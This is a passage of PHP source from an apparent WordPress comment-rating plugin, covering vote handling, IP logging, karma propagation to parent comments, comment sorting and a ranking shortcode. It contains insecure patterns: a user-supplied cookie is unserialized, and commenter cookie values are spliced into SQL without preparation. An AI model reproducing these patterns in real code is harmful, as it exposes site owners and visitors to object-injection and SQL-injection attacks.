			if ( false === strpos( $str, '%d' ) ) {
				$str = '(%d)';
			}

			$str   = str_replace( '%d', '<span class="wpbcr-r">%d</span>', $str );
			$order = $this->find_element_order( $elements, (int) $this->get_setting( 'total_rating_position', 2 ) );
			//$rating           = sprintf( $str, intval( get_comment_meta( $comment->comment_ID, 'wpbcr_rating', true ) ) );
			$rating             = sprintf( $str, $rating );
			$elements[ $order ] = '<span class="wpbcr-rating">' . $rating . '</span>';
		}

		ksort( $elements );

		$elements = apply_filters( 'wpbcr_output_elements', $elements, $comment );

		# save for a later use (maybe for theme authors)
		$comment->comment_wpbcr_elements = $elements;

		$classes = apply_filters( 'wpbcr_comment_rating_classes', array( 'wpb-comment-rating' ), $comment );

		$content = '<div class="' . implode( ' ', $classes ) . '">';
		foreach ( $elements as $element ) {
			$content .= $element;
		}
		$content .= ' <span style="display:none;" class="wpbcr-loader wpbcr-icon wpbcr-icon-cog wpbcr-icon-spin"></span></div>';

		$comment->comment_content .= apply_filters( 'wpbcr_output_html', $content, $comment );

		$comment->wpb_cr_karma_added = true;

		return $comment;
	}

	/**
	 * @param array $elements
	 * @param int   $i
	 *
	 * @return int
	 */
	private function find_element_order( &$elements, $i = 1 ) {
		if ( ! is_int( $i ) ) {
			$i = 1;
		}
		while ( true ) {
			if ( ! isset( $elements[ $i ] ) ) {
				return $i;
			}
			$i ++;
		}

		return 0;
	}


	/**
	 * This function removes the get_comment filter just before WordPress wants to notify the author of a new comment
	 * @todo  Important: To remove a hook, the $function_to_remove and $priority arguments must match when the hook was added. This goes for both filters and actions. No warning will be given on removal failure.
	 *
	 * @param bool $false always false
	 *
	 * @return bool always false
	 * @since 1.0
	 */
	public function deactivate_comment_rating_during_notify( $false = false ) {
		remove_filter( 'get_comment', array( &$this, 'cr_get_comment' ), 100 );

		return false; // must always return false
	}


	/**
	 * Deletes the object cache for the get_comment call after adding a new comment to prevent adding HTML codes while sending emails via wp_notifiy_postauthor()
	 *
	 * @param $comment_id
	 * @param $comment_approved
	 *
	 * @return void
	 * @since 1.0
	 */
	public function delete_get_comment_cache( $comment_id, $comment_approved ) {
		wp_cache_delete( $comment_id, 'comment' );
		$this->deactivate_comment_rating_during_notify();
	}


	/**
	 * Rates a comment.
	 *
	 * @since 1.0
	 * @global \wpdb $wpdb
	 */
	public function ajax_rate_comment() {

		// check nonces, if used
		if ( (bool) $this->get_setting( 'use_nonces', true ) ) {
			check_ajax_referer( 'wpbcr_ajax_comment', 'wpbcr_nonce' );
		}

		// check if the id was set in the GET parameter
		if ( ! isset( $_GET['wpbcr_id'] ) ) {
			wp_die( __( 'No comment ID was found.', $this->get_textdomain() ), __( 'Comment Rating Plugin Error', $this->get_textdomain() ) );
		}

		// if "only logged-in users are allowed to rate" is active: check if the user is logged in
		if ( (bool) $this->get_setting( 'only_logged_in', 0 ) && ! is_user_logged_in() ) {
			if ( isset( $_SERVER['HTTP_X_REQUESTED_WITH'] ) && 'xmlhttprequest' == strtolower( $_SERVER['HTTP_X_REQUESTED_WITH'] ) ) {
				wp_send_json_error( array( 'message' => __( 'You must be logged-in to rate this comment.', $this->get_textdomain() ) ) );
			}
			wp_die( __( 'You must be logged-in to rate this comment.', $this->get_textdomain() ), __( 'Comment Rating Plugin Error', $this->get_textdomain() ) );
		}

		// filter the ID to secure it for a later usage in database queries
		$id = filter_input( INPUT_GET, 'wpbcr_id', FILTER_VALIDATE_INT );

		// check if the id is int
		if ( ! is_int( $id ) ) {
			wp_die( __( 'Comment ID has the wrong format.', $this->get_textdomain() ), __( 'Comment Rating Plugin Error', $this->get_textdomain() ) );
		}

		/**
		 * @var \wpdb $wpdb
		 */
		global $wpdb;

		//  if "only logged-in users are allowed to rate" is active: check if user has rated already
		if ( (bool) $this->get_setting( 'only_logged_in', 0 ) && is_user_logged_in() ) {
			$user_id = get_current_user_id();
			$rated   = (array) get_user_meta( $user_id, 'wpbcr_rated', true );
			if ( in_array( $id, $rated ) ) {
				if ( isset( $_SERVER['HTTP_X_REQUESTED_WITH'] ) && 'xmlhttprequest' == strtolower( $_SERVER['HTTP_X_REQUESTED_WITH'] ) ) {
					wp_send_json_error( array( 'message' => __( 'You have already rated this comment.', $this->get_textdomain() ) ) );
				}
				wp_die( __( 'You have already rated this comment.', $this->get_textdomain() ), __( 'Comment Rating Plugin Error', $this->get_textdomain() ) );
			}
		} else if ( (bool) $this->get_setting( 'set_cookies', 0 ) || (bool) $this->get_setting( 'log_ips', 1 ) ) {
			if ( (bool) $this->get_setting( 'set_cookies', 0 ) ) {

				$rated = array();
				if ( isset( $_COOKIE[ 'wpbcr_rated_' . COOKIEHASH ] ) ) {
					$rated = maybe_unserialize( $_COOKIE[ 'wpbcr_rated_' . COOKIEHASH ] );
				}

				if ( ! is_array( $rated ) ) {
					$rated = array();
				}

				if ( in_array( $id, $rated ) ) {
					if ( isset( $_SERVER['HTTP_X_REQUESTED_WITH'] ) && 'xmlhttprequest' == strtolower( $_SERVER['HTTP_X_REQUESTED_WITH'] ) ) {
						wp_send_json_error( array( 'message' => __( 'You have already rated this comment.', $this->get_textdomain() ) ) );
					}
					wp_die( __( 'You have already rated this comment.', $this->get_textdomain() ), __( 'Comment Rating Plugin Error', $this->get_textdomain() ) );
				}
			}

			// check if IP logging is ON: If so check if the current IP address is in the database already
			if ( (bool) $this->get_setting( 'log_ips', 1 ) ) {
				$user_ip = $this->get_user_ip_addr( (bool) $this->get_setting( 'hash_ips', 1 ) );

				// remove old entries
				$hours = intval( $this->get_setting( 'log_ips', 24 ) );
				$wpdb->query( $wpdb->prepare( 'DELETE FROM ' . $wpdb->prefix . 'cr_ips WHERE ADDDATE( cr_time, INTERVAL %u HOUR ) < NOW()', $hours ) );
				unset( $hours );

				$res = $wpdb->get_var( $wpdb->prepare( 'SELECT COUNT(*) FROM ' . $wpdb->prefix . 'cr_ips WHERE cr_ip = %s AND cr_comment_id = %u', $user_ip, $id ) );

				if ( ! is_int( $res ) && $res > 0 ) {
					if ( isset( $_SERVER['HTTP_X_REQUESTED_WITH'] ) && 'xmlhttprequest' == strtolower( $_SERVER['HTTP_X_REQUESTED_WITH'] ) ) {
						wp_send_json_error( array( 'message' => __( 'You have already rated this comment.', $this->get_textdomain() ) ) );
					}
					wp_die( __( 'You have already rated this comment.', $this->get_textdomain() ), __( 'Comment Rating Plugin Error', $this->get_textdomain() ) );
				}
				unset( $res );
			}
		}

		$whereto = 'up';

		if ( isset( $_GET['whereto'] ) ) {
			$whereto = strtolower( $_GET['whereto'] );
		}

		if ( 'up' == $whereto && ! (bool) $this->get_setting( 'is_vote_up', 1 ) ) {
			wp_die( __( 'Voting up has been disabled.', $this->get_textdomain() ), __( 'Comment Rating Plugin Error', $this->get_textdomain() ) );
		}

		if ( 'down' == $whereto && ! (bool) $this->get_setting( 'is_vote_down', 1 ) ) {
			wp_die( __( 'Voting down has been disabled.', $this->get_textdomain() ), __( 'Comment Rating Plugin Error', $this->get_textdomain() ) );
		}

		// Check if the comment exists.
		if ( 1 != (int) $wpdb->get_var( $wpdb->prepare( 'SELECT COUNT(*) FROM ' . $wpdb->comments . ' WHERE comment_id=%d', $id ) ) ) {
			wp_die( __( 'There is no comment with this comment ID.', $this->get_textdomain() ), __( 'Comment Rating Plugin Error', $this->get_textdomain() ) );
		}


		$updown = '+1';

		if ( 'down' == $whereto ) {
			$updown = '-1';
		}

		$u = $wpdb->query( $wpdb->prepare( 'UPDATE ' . $wpdb->commentmeta . ' SET meta_value = IFNULL( meta_value, 0 ) ' . $updown . ' WHERE meta_key=%s AND comment_id = %d', 'wpbcr_karma', $id ) );
		// update the rating for the comment_id $id
		if ( empty( $u ) ) {
			if ( 1 != $wpdb->insert( $wpdb->commentmeta, array(
					'meta_key'   => 'wpbcr_karma',
					'meta_value' => intval( $updown ),
					'comment_id' => $id
				), array( '%s', '%d' ) )
			) {
				wp_die( __( 'Comment rating could not be updated', $this->get_textdomain() ), __( 'Comment Rating Plugin Error', $this->get_textdomain() ) );
			}
		}
		unset( $u );

		// then get all parents of the comment_id $id
		$parents_str = $this->get_parents( $id );

		// and update all parents, if necessary
		if ( ! empty( $parents_str ) ) {
			$parents       = explode( ',', $parents_str );
			$parents_count = count( $parents );

			// first update all parents at once, if possible
			$parents_updated = $wpdb->query( $wpdb->prepare( 'UPDATE ' . $wpdb->commentmeta . ' SET meta_value = IFNULL( meta_value, 0 ) ' . $updown . ' WHERE meta_key=%s AND comment_id IN(' . $parents_str . ')', 'wpbcr_karma', 'wpbcr_Karma' ) );

			// check if all parents have been updated successfully, if not, run through all parents again and add a new field
			if ( $parents_updated != $parents_count ) {

				foreach ( $parents as $parent ) {

					if ( 1 != $wpdb->insert( $wpdb->commentmeta, array(
							'meta_key'   => 'wpbcr_karma',
							'meta_value' => intval( $updown ),
							'comment_id' => $parent
						), array( '%s', '%d' ) )
					) {
						$this->log(
							sprintf(
								__( 'Could not update parent comment with ID %1$s from child comment with ID %2$s. If this errors persists, please inform the author of this plugin. Thanks!', $this->get_textdomain() ),
								'<a target="_blank" href="' . get_comment_link( $parent ) . '">' . $parent . '</a>',
								'<a target="_blank" href="' . get_comment_link( $id ) . '">' . $id . '</a>'
							)
						);
					}
				}
			}

		}

		// count total ratings
		$u = $wpdb->query( $wpdb->prepare( 'UPDATE ' . $wpdb->commentmeta . ' SET meta_value = IFNULL(meta_value,0) + 1 WHERE meta_key=%s AND comment_id = %d', 'wpbcr_ratings_total', $id ) );
		if ( empty( $u ) ) {
			if ( 1 != $wpdb->insert( $wpdb->commentmeta, array(
					'meta_key'   => 'wpbcr_ratings_total',
					'meta_value' => 1,
					'comment_id' => $id
				), array( '%s', '%d' ) )
			) {
				$this->log( sprintf( __( 'Someone rated the comment with the ID %1$s successfully. But the number of total ratings could not be updated. If this errors persists, please inform the author of this plugin. Thanks!', $this->get_textdomain() ), '<a target="_blank" href="' . get_comment_link( $id ) . '">' . $id . '</a>' ) );
			}
		}
		unset( $u );

		$u = $wpdb->query( $wpdb->prepare( 'UPDATE ' . $wpdb->commentmeta . ' SET meta_value = IFNULL(meta_value,0) ' . $updown . ' WHERE meta_key=%s AND comment_id = %d', 'wpbcr_rating', $id ) );
		// count rating
		if ( empty( $u ) ) {
			if ( 1 != $wpdb->insert( $wpdb->commentmeta, array(
					'meta_key'   => 'wpbcr_rating',
					'meta_value' => intval( $updown ),
					'comment_id' => $id
				), array( '%s', '%d' ) )
			) {
				$this->log( sprintf( __( 'Someone rated the comment with the ID %1$s successfully. But the rating could not be updated. If this errors persists, please inform the author of this plugin. Thanks!', $this->get_textdomain() ), '<a target="_blank" href="' . get_comment_link( $id ) . '">' . $id . '</a>' ) );
			}
		}
		unset( $u );

		// update user ratings if s/he is logged in
		if ( (bool) $this->get_setting( 'only_logged_in', 0 ) && is_user_logged_in() ) {
			$rated[] = $id;
			update_user_meta( $user_id, 'wpbcr_rated', $rated );
		} else {
			if ( (bool) $this->get_setting( 'set_cookies', 0 ) ) {
				$rated[]     = $id;
				$cookie_time = intval( $this->get_setting( 'cookie_time', 48 ) );
				$cookie_time = intval( sprintf( '%u', $cookie_time ) ); // makes an unsigned int
				$expire      = time() + ( $cookie_time * HOUR_IN_SECONDS );
				setcookie( 'wpbcr_rated_' . COOKIEHASH, serialize( $rated ), $expire, COOKIEPATH, COOKIE_DOMAIN, ( 'https' === parse_url( home_url(), PHP_URL_SCHEME ) ) );
			}

			// insert the IP address of the users but first delete all old entries
			if ( (bool) $this->get_setting( 'log_ips', 1 ) ) {
				$wpdb->query( $wpdb->prepare( 'INSERT INTO ' . $wpdb->prefix . 'cr_ips (cr_ip, cr_comment_id) VALUES (%s, %u) ON DUPLICATE KEY UPDATE cr_time = CURRENT_TIMESTAMP', $user_ip, $id ) );
			}
		}

		/**
		 * Check if the request comes from a jQuery request. If so, return json data. Otherwise redirect the user back to the post.
		 */
		if ( isset( $_SERVER['HTTP_X_REQUESTED_WITH'] ) && 'xmlhttprequest' == strtolower( $_SERVER['HTTP_X_REQUESTED_WITH'] ) ) {
			wp_send_json_success( array( 'message' => __( 'Thanks for rating!', $this->get_textdomain() ) ) );
		}

		wp_redirect( get_comment_link( $id ) );

	}

	/**
	 * Enqueues the scripts and styles on the frontend side.
	 *
	 * @since 1.0
	 */
	public function enqueue_scripts_frontend() {

		$this->setup_nonce();

		wp_enqueue_script( 'wpbcr_frontend_js', $this->plugins_url( 'assets/js/wpb-cr-frontend.js' ), array( 'jquery' ) );

		wp_enqueue_style( 'wpbcr_frontend_css', $this->plugins_url( 'assets/css/wpb-cr-frontend.css' ) );

		$html_vote_up_icon   = $this->get_setting( 'vote_up_html_icon' );
		$html_vote_down_icon = $this->get_setting( 'vote_down_html_icon' );

		if ( ( (bool) $this->get_setting( 'is_vote_up', 1 ) && empty( $html_vote_up_icon ) ) OR ( (bool) $this->get_setting( 'is_vote_down', 1 ) && empty( $html_vote_down_icon ) ) ) {
			wp_enqueue_style( 'wpbcr_frontend_css_awesome', $this->plugins_url( 'assets/css/wpb-cr-frontend-awesome.css' ) );
		}

		wp_localize_script( 'wpbcr_frontend_js', 'WPBAjaxCommentRating', array(
				'ajaxurl' => admin_url( 'admin-ajax.php' ),
				'a'       => 'wpbcr_ajax_comment',
				'nonce'   => (string) $this->_nonce
			)
		);

	}


	/**
	 * Setting up the nonce that is used in the voting links.
	 *
	 * @since 1.0
	 */
	private function setup_nonce() {
		global $post;
		if ( ! is_a( $post, 'WP_Post' ) ) {
			return;
		}
		if ( (bool) $this->get_setting( 'use_nonces', true ) ) {
			$this->_nonce = wp_create_nonce( 'wpbcr_ajax_comment' );
		}
	}


	/**
	 * @since 1.0.0
	 * @return array
	 */
	private function get_up_icons() {
		$icons = array(
			'check',
			'sort-desc',
			'star',
			'thumbs-up',
			'check-circle',
			'heart',
			'plus-circle',
			'caret-square-o-up',
			'check-circle-o',
			'plus-square',
			'plus-square-o',
			'thumbs-o-up',
			'smile-o',
			'arrow-circle-up',
			'arrow-circle-o-up',
			'arrow-up',
			'chevron-circle-up',
			'hand-o-up',
			'angle-double-up'
		);

		return apply_filters( 'wpbcr_up_icons', $icons );
	}


	/**
	 * @since 1.0.0
	 * @return array
	 */
	private function get_down_icons() {
		$icons = array(
			'check',
			'sort-asc',
			'star-o',
			'thumbs-down',
			'minus-circle',
			'heart-o',
			'caret-square-o-down',
			'minus-square',
			'minus-square-o',
			'thumbs-o-down',
			'meh-o',
			'frown-o',
			'arrow-circle-down',
			'arrow-circle-o-down',
			'arrow-down',
			'chevron-circle-up',
			'hand-o-down',
			'angle-double-down'
		);

		return apply_filters( 'wpbcr_down_icons', $icons );
	}


	/**
	 * Echos out the custom styles.
	 *
	 * @since 1.0.0
	 */
	public function custom_css() {

		// Vote up
		$vote_up_color = $this->get_setting( 'vote_up_color', '' );
		if ( ! empty( $vote_up_color ) ) {
			$vote_up_color = 'color:' . $vote_up_color . ';';
		}

		$vote_up_font_size = intval( $this->get_setting( 'vote_up_font_size', 14 ) );
		if ( empty( $vote_up_font_size ) OR $vote_up_font_size <= 0 ) {
			$vote_up_font_size = 14;
		}
		$vote_up_font_size = 'font-size:' . sprintf( '%u', $vote_up_font_size ) . 'px;';


		// Vote down
		$vote_down_color = $this->get_setting( 'vote_down_color', '' );
		if ( ! empty( $vote_down_color ) ) {
			$vote_down_color = 'color:' . $vote_down_color . ';';
		}

		$vote_down_font_size = intval( $this->get_setting( 'vote_down_font_size', 14 ) );
		if ( empty( $vote_down_font_size ) OR $vote_down_font_size <= 0 ) {
			$vote_down_font_size = 14;
		}
		$vote_down_font_size = 'font-size:' . sprintf( '%u', $vote_down_font_size ) . 'px;';


		// Total rating
		$total_rating_color = $this->get_setting( 'total_rating_color', '' );
		if ( ! empty( $total_rating_color ) ) {
			$total_rating_color = 'color:' . $total_rating_color . ';';
		}

		$total_rating_font_size = intval( $this->get_setting( 'total_rating_font_size', 14 ) );
		if ( empty( $total_rating_font_size ) OR $total_rating_font_size <= 0 ) {
			$total_rating_font_size = 14;
		}
		$total_rating_font_size = 'font-size:' . sprintf( '%u', $total_rating_font_size ) . 'px;';


		// Custom css
		$css = $this->get_setting( 'custom_css', '' );
		$css = apply_filters( 'wpbcr_custom_css', $css );

		echo "<style type=\"text/css\">.wpbcr-rate-up { $vote_up_font_size $vote_up_color } .wpbcr-rate-down{ $vote_down_font_size $vote_down_color } .wpbcr-rating, .wpbcr-already-rated{ $total_rating_font_size $total_rating_color } {$css}</style>";
	}


	/**
	 * Gets the IP address of the user and anonymizes it
	 *
	 * @param bool $hashed Set to true if the IP should be returned by using MD5
	 *
	 * @return string
	 * @since 1.0
	 */
	public static function get_user_ip_addr( $hashed = true ) {
		$REMOTE_ADDR = $_SERVER['REMOTE_ADDR'];
		if ( ! empty( $_SERVER['X_FORWARDED_FOR'] ) ) {
			$X_FORWARDED_FOR = explode( ',', $_SERVER['X_FORWARDED_FOR'] );
			if ( ! empty( $X_FORWARDED_FOR ) ) {
				$REMOTE_ADDR = trim( $X_FORWARDED_FOR[0] );
			}
		} /*
		* Some php environments will use the $_SERVER['HTTP_X_FORWARDED_FOR']
		* variable to capture visitor address information.
		*/
		elseif ( ! empty( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) {
			$HTTP_X_FORWARDED_FOR = explode( ',', $_SERVER['HTTP_X_FORWARDED_FOR'] );
			if ( ! empty( $HTTP_X_FORWARDED_FOR ) ) {
				$REMOTE_ADDR = trim( $HTTP_X_FORWARDED_FOR[0] );
			}
		}
		$ip = preg_replace( '/[^0-9a-f:\., ]/si', '', $REMOTE_ADDR );

		if ( $hashed ) {
			return apply_filters( 'wpbcr_user_ip_addr_hashed', wp_hash( $ip ) );
			//return md5( $ip );
		}

		return apply_filters( 'wpbcr_user_ip_addr', $ip );
	}

	/**
	 * @since 1.0
	 * @global \wpdb $wpdb
	 */
	public function on_activation() {

		/**
		 * @var \wpdb $wpdb
		 */
		global $wpdb;

		if ( ! is_a( $wpdb, 'wpdb' ) ) {
			return;
		}

		$wpdb->query( 'CREATE TABLE IF NOT EXISTS `' . $wpdb->prefix . 'cr_ips` ('
		              . ' `cr_id` SERIAL,'
		              . ' `cr_comment_id` bigint(20) unsigned NOT NULL,'
		              . ' `cr_ip` varchar(64) NOT NULL,'
		              . ' `cr_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,'
		              . ' UNIQUE KEY `cr_comment_id` (`cr_comment_id`,`cr_ip`)'
		              . ' ) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;' );
	}


	/**
	 * Resorts the comments array.
	 *
	 * Hooks into the 'comments_array' filter. At current it's not really possible to hook into the MySQL-select directly.
	 * However there are some queries defined in /wp-includes/query.php but it seems that they are not used. Instead
	 * themes are using the comments_template() functionality which then is using the 'comments_array' filter.
	 *
	 * @todo For a future release check if WordPress is using the API instead of standard SELECTS in /wp-includes/comment-template.php (Line 1017) that we can hook into (for performance reasons)
	 * @see  comments_template()
	 *
	 * @param array $comments
	 * @param int   $post_id
	 *
	 * @return array
	 */
	public function sort_comments( $comments, $post_id ) {

		if ( ! is_array( $comments ) ) {
			return $comments;
		}

		if ( count( $comments ) <= 0 ) {
			return $comments;
		}

		if ( ! (bool) $this->get_setting( 'is_resorting', 1 ) ) {
			return $comments;
		}

		$comment_ids = wp_list_pluck( $comments, 'comment_ID' );

		/**
		 * @var \wpdb $wpdb
		 */
		global $wpdb, $user_ID;

		// additional where according to @see comments_template() function.
		$add_where = '';

		/**
		 * Comment author information fetched from the comment cookies.
		 *
		 * @uses wp_get_current_commenter()
		 */
		$commenter = wp_get_current_commenter();

		/**
		 * The name of the current comment author escaped for use in attributes.
		 */
		$comment_author = $commenter['comment_author']; // Escaped by sanitize_comment_cookies()

		/**
		 * The email address of the current comment author escaped for use in attributes.
		 */
		$comment_author_email = $commenter['comment_author_email']; // Escaped by sanitize_comment_cookies()

		if ( $user_ID ) {
			$add_where .= sprintf( '  AND ( c.comment_approved = "1" OR ( c.user_id = %d AND c.comment_approved = "0" ) ) ', $user_ID );
		} elseif ( ! empty( $comment_author ) ) {
			$add_where .= sprintf( ' AND ( c.comment_approved = "1" OR ( c.comment_author = "%s" AND c.comment_author_email = "%s" AND c.comment_approved = "0" ) ) ', $comment_author, $comment_author_email );
		} else {
			$add_where .= ' AND c.comment_approved = "1" ';
		}

		return $wpdb->get_results( 'SELECT DISTINCT c.*, IFNULL(cm.meta_value, 0) as comment_wpbcr_karma, IFNULL(cm2.meta_value, 0) as comment_wpbcr_rating '
		                           . ' FROM ' . $wpdb->comments . ' as c '
		                           . ' LEFT JOIN ' . $wpdb->commentmeta . ' as cm '
		                           . ' ON (cm.comment_ID = c.comment_ID AND cm.meta_key="wpbcr_karma") '
		                           . ' LEFT JOIN ' . $wpdb->commentmeta . ' as cm2 '
		                           . ' ON (cm2.comment_ID = c.comment_ID AND cm2.meta_key="wpbcr_rating") '
		                           . ' WHERE c.comment_ID IN(' . implode( ',', $comment_ids ) . ') '
		                           . $add_where
		                           . ' GROUP BY c.comment_ID '
		                           . ' ORDER BY CAST( comment_wpbcr_karma AS SIGNED ) DESC, comment_date_gmt '
		);
	}


	/**
	 * Returns the parents ids of a comment with $comment_id in a comma separated format
	 *
	 * @since 1.0.0
	 *
	 * @param int $comment_id
	 *
	 * @return string output like 1,2,3,4,5
	 */
	private function get_parents( $comment_id ) {
		/**
		 * @var \wpdb $wpdb
		 */
		global $wpdb;

		return $wpdb->get_var(
			$wpdb->prepare(
				'SELECT GROUP_CONCAT( T2.comment_ID SEPARATOR "," )
							FROM (
									SELECT
											@r AS _id,
											(SELECT @r := comment_parent FROM ' . $wpdb->comments . ' WHERE comment_ID = _id) AS comment_parent,
									@l := @l + 1 AS lvl
							FROM
									(SELECT @r := %u, @l := 0) vars,
									' . $wpdb->comments . ' h
							WHERE @r <> 0) T1
					JOIN ' . $wpdb->comments . ' T2
					ON T1._id = T2.comment_ID
					WHERE T2.comment_ID != %u
					ORDER BY T1.lvl DESC',
				$comment_id,
				$comment_id
			)
		);
	}


	/**
	 * Prepares the deletion of a comment rating
	 *
	 * @param int $comment_id
	 *
	 * @since 1.0.0
	 */
	public function prepare_delete_comment_ratings( $comment_id ) {
		$this->_deleted_parents        = $this->get_parents( $comment_id );
		$this->_deleted_comment_rating = intval( get_comment_meta( $comment_id, 'wpbcr_rating', true ) );
	}


	/**
	 * Updates comment_karma fields for parents.
	 *
	 * At this point of time the comment with $comment_id does no longer exist.
	 * Also the commentmeta-fields for this comment have been deleted.
	 *
	 * @param int $comment_id
	 */
	public function delete_comment_ratings( $comment_id ) {

		if ( is_null( $this->_deleted_parents ) ) {
			return;
		}

		/**
		 * @var \wpdb $wpdb
		 */
		global $wpdb;

		$wpdb->query( $wpdb->prepare( 'UPDATE ' . $wpdb->commentmeta . ' SET meta_value = IFNULL( meta_value, 0 ) - (%d) WHERE meta_key = "wpbcr_karma" AND comment_id IN(' . $this->_deleted_parents . ')', $this->_deleted_comment_rating ) );

	}


	/**
	 * @param int    $comment_id
	 * @param string $status "delete" | "approve" | "spam" | "hold"
	 *
	 * @since 1.0.0
	 */
	public function wp_set_comment_status( $comment_id, $status ) {

		/**
		 * @var \wpdb $wpdb
		 */
		global $wpdb;

		// remove comment karma from parents
		if ( 'hold' == $status OR 'spam' == $status ) {

			// get the parents
			$parents = $this->get_parents( $comment_id );

			// stop if there are no parents
			if ( is_null( $parents ) OR empty( $parents ) ) {
				return;
			}

			$rating = intval( get_comment_meta( $comment_id, 'wpbcr_rating', true ) );

			// update parents karma
			$wpdb->query( $wpdb->prepare( 'UPDATE ' . $wpdb->commentmeta . ' SET meta_value = IFNULL( meta_value, 0 ) - (%d) WHERE meta_key = "wpbcr_karma" AND comment_id IN(' . $parents . ')', $rating ) );
		} // add comment karma to parents
		elseif ( 'approve' == $status ) {

			// get the parents
			$parents = $this->get_parents( $comment_id );

			// stop if there are no parents
			if ( is_null( $parents ) OR empty( $parents ) ) {
				return;
			}

			$rating = intval( get_comment_meta( $comment_id, 'wpbcr_rating', true ) );

			// update parents karma
			$wpdb->query( $wpdb->prepare( 'UPDATE ' . $wpdb->commentmeta . ' SET meta_value = IFNULL( meta_value, 0 ) + (%d) WHERE meta_key = "wpbcr_karma" AND comment_id IN(' . $parents . ')', $rating ) );

		}

	}


	/**
	 * Shows an error if the user really wants to uninstall the plugin
	 *
	 * @since  1.4.1
	 * @access public
	 *
	 * @return void
	 */
	public function uninstall_1() {
		add_settings_error(
			'wpbcr_uninstall',
			0,
			__( 'Really want to uninstall this plugin? Note that every setting and every rating will be lost forever! After the uninstall the plugin will be deactivate itself.', $this->get_textdomain() )
			. '<br /><a href="' . esc_url( add_query_arg( array( 'wpb_plugin_page_action' => 'wpbcr_uninstall_step2' ) ) ) . '" class="button wpbcr-button-deletion">' . __( 'Yes', $this->get_textdomain() ) . '</a> '
			. '<a href="' . esc_url( add_query_arg( array( 'wpb_plugin_page_action' => '0' ) ) ) . '" class="button button-primary">' . __( 'No', $this->get_textdomain() ) . '</a>'
		);
	}


	/**
	 * Uninstalls the plugin and deactivates it.
	 *
	 * @since 1.0.0
	 * @since 1.1.0 added $deactivate parameter
	 */
	public function uninstall( $deactivate = true ) {

		// call the parents uninstall routine
		parent::uninstall();

		/**
		 * @var \wpdb $wpdb ;
		 */
		global $wpdb;

		// remove all data from the commentmeta table
		$wpdb->query( 'DELETE FROM ' . $wpdb->commentmeta . ' WHERE meta_key LIKE "wpbcr_%"' );

		// remove all data from the usermeta table
		$wpdb->query( 'DELETE FROM ' . $wpdb->usermeta . ' WHERE meta_key LIKE "wpbcr_%"' );

		// remove the IP table
		$wpdb->query( 'DROP TABLE IF EXISTS ' . $wpdb->prefix . 'cr_ips' );

		if ( $deactivate ) {
			// deactivate this plugin
			deactivate_plugins( $this->plugin_file );

			wp_redirect( admin_url( 'plugins.php' ) );

			// do not add this message in __() because the plugin is no longer active
			die( 'Plugin has been uninstalled and deactivated. <a href="' . admin_url( 'plugins.php' ) . '">Back to administration panel</a>' );
		}
	}


	/**
	 * Adds new columns to the overview of posts, pages and custom post types
	 *
	 * @since 1.0
	 *
	 * @param array $columns
	 *
	 * @return array
	 */
	public function manage_posts_columns( $columns ) {
		//array_splice( $columns, 2, count($columns), array( 'wpbph_rating' => __( 'Rating', $this->get_textdomain() ) ) );
		$columns['wpbcr_rating'] = __( 'Rating/Votes', $this->get_textdomain() );

		return $columns;
	}


	/**
	 * Fills the columns of the edit-comments screen.
	 *
	 * @since 1.0
	 *
	 * @param array $column
	 * @param int   $comment_id
	 */
	public function manage_comments_custom_column( $column, $comment_id ) {

		if ( 'wpbcr_rating' == $column ) {
			$rating = get_comment_meta( $comment_id, 'wpbcr_rating', true );
			$rating = intval( $rating );

			$ratings_total = get_comment_meta( $comment_id, 'wpbcr_ratings_total', true );
			$ratings_total = intval( $ratings_total );

			printf( '%d/%u', $rating, $ratings_total );
		}

	}


	/**
	 * @since 1.0.0
	 * @return mixed|void
	 */
	public function get_purchase_code() {
		return $this->get_setting( 'purchase_code' );
	}


	/**
	 * Prints the shortcode.
	 *
	 * @since 1.1.0
	 *
	 * @param array       $atts
	 * @param string      $content
	 * @param null|string $return What should be returned
	 *
	 * @global \wpdb      $wpdb
	 *
	 * @return string
	 */
	public function shortcode_comment_ranking( $atts, $content = '', $return = null ) {
		$atts = shortcode_atts( array(
			'post_id' => '',
			'do'      => 'best-rated',
			'limit'   => 5
		), $atts );

		$atts['do'] = filter_var( $atts['do'], FILTER_SANITIZE_STRING );

		$get_best_comments_of_blog = false;

		/**
		 * @var \wpdb $wpdb
		 */
		global $wpdb;

		if ( is_null( $atts['post_id'] ) OR 'null' == strtolower( $atts['post_id'] ) ) {
			$get_best_comments_of_blog = true;
		}

		$atts['post_id'] = absint( $atts['post_id'] );

		if ( empty( $atts['post_id'] ) ) {
			$atts['post_id'] = null;

			// try to fetch the global $post
			global $post;
			if ( is_a( $post, 'WP_Post' ) ) {
				$atts['post_id'] = $post->ID;
			}
		}

		/**
		 * What comments?
		 */
		$where = '1=1';
		if ( false === $get_best_comments_of_blog ) {
			$where = $wpdb->prepare( 'c.comment_post_ID = %u', $atts['post_id'] );
		}

		switch ( strtolower( $atts['do'] ) ) {
			case 'highest-rating-count-and-best-rated':
				$where .= ' AND cm.meta_value > 0 ';
				break;
			case 'best-rated-and-highest-rating-count':
				$where .= ' AND cm.meta_value > 0 ';
				break;
		}

		/**
		 * DO
		 */
		switch ( strtolower( $atts['do'] ) ) {
			case 'highest-rating-count':
				$sort_by = array(
					1 => 'CAST( wpbcr_ratings_total AS SIGNED ) DESC ',
					2 => 'CAST( wpbcr_rating AS SIGNED ) DESC '
				);
				break;
			case 'lowest-rating-count':
				$sort_by = array(
					1 => 'CAST( wpbcr_ratings_total AS SIGNED ) ASC ',
					2 => 'CAST( wpbcr_rating AS SIGNED ) DESC '
				);
				break;
			case 'worst-rated':
				$sort_by = array(
					1 => 'CAST( wpbcr_rating AS SIGNED ) ASC ',
					2 => 'CAST( wpbcr_ratings_total AS SIGNED ) DESC '
				);
				break;
			case 'highest-rating-count-and-best-rated':
				$sort_by = array(
					1 => 'CAST( wpbcr_ratings_total AS SIGNED ) DESC ',
					2 => 'CAST( wpbcr_rating AS SIGNED ) DESC '
				);
				break;
			default:
				$sort_by = array(
					1 => 'CAST( wpbcr_rating AS SIGNED ) DESC ',
					2 => 'CAST( wpbcr_ratings_total AS SIGNED ) DESC '
				);
				break;
		}

		do_action_ref_array( 'wpbcr_shortcode_best_comments_sql_sort_by', array( &$sort_by, $atts['do'] ) );

		$sort_by = implode( ', ', $sort_by );

		/**
		 * LIMIT
		 */
		$limit = abs( intval( $atts['limit'] ) );

